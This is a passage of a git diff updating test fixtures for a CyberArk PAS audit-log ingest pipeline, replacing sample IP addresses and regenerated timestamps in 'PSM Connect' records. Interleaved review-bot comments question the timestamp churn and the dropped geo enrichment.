06:18:31","IsoTimestamp":"2021-03-15T13:18:31Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:06\n 2021-03-15T14:08:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:06","IsoTimestamp":"2021-03-15T14:08:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:28\n 2021-03-15T14:08:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:28","IsoTimestamp":"2021-03-15T14:08:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T14:11:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:09\n 2021-03-15T14:11:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:09","IsoTimestamp":"2021-03-15T14:11:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-16T10:04:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:51\n 2021-03-16T10:04:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:51","IsoTimestamp":"2021-03-16T10:04:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM 
Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json index 3a58aa20d0d..8ae5563f787 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json 
@@ -82,7 +82,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936250700Z", + "ingested": "2021-12-09T13:36:47.331129200Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.7\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" 
Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Tesla\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"300\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.7\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Tesla\"}]}}}}", "code": "300", "kind": "event", @@ -106,20 +106,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { 
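Review bot: The only change in `@@ -82,7 +82,7 @@` is the `event.ingested` timestamp, which was regenerated together with the IP fixtures and carries no information about the change; the same rewrite appears in `@@ -200,8 +191,8 @@`, `@@ -318,8 +300,8 @@` and `@@ -436,8 +409,8 @@`. Re-running the generator will rewrite it again on every unrelated update, so the expected file never stabilises and real changes are buried in timestamp noise. Keeping the previous `ingested` values, or having the pipeline test compare with that field excluded, would leave only the intended address changes in the diff.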
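Review bot: In `@@ -106,20 +106,11 @@` the new expectation has no `destination.geo` at all, where the old one carried a full geo block for the previous address; `@@ -224,20 +215,11 @@` and `@@ -342,20 +324,11 @@` drop it the same way. The changelog describes `67.43.156.15` as part of the supported test subset, so if the pipeline still runs a geoip processor on `destination.ip`, the regenerated output should contain the location the test database returns for that address rather than nothing — an empty result suggests the file was regenerated without that database, and the fixture would now pass without exercising the enrichment. If the processor was deliberately removed or restricted to `source.ip`, a sentence in the package changelog saying so would make the missing block intentional rather than an unnoticed regression. The `source` object that follows is cut off at the hunk boundary, so whether `source.geo` survived cannot be checked here.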
@@ -143,7 +134,7 @@
 },
 "@timestamp": "2021-03-11T17:38:20.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian"
+ "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian"
 },
 "ecs": {
 "version": "1.12.0"
@@ -155,15 +146,15 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:38:20Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e",
 "message": "PSM Connect",
 "issuer": "Administrator",
 "extra_details": {
@@ -176,20 +167,20 @@
 "psmid": "PSMServer",
 "session_id": "87012dcc-8290-11eb-949e-080027efd402",
 "src_host": "127.0.0.1",
- "dst_host": "34.123.103.115"
+ "dst_host": "67.43.156.15"
 },
 "rfc5424": true,
 "ca_properties": {
 "other": {},
 "device_type": "Operating System",
- "address": "34.123.103.115",
+ "address": "67.43.156.15",
 "creation_method": "PVWA",
 "policy_id": "UnixSSHKeys",
 "user_name": "adrian"
 },
- "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
+ "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian",
 "safe": "PSM",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "PSM Connect",
 "timestamp": "Mar 11 09:38:20",
 "desc": "PSM Connect"
@@ -200,8 +191,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936265600Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:20\",\"IsoTimestamp\":\"2021-03-11T17:38:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331138600Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n 
\u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
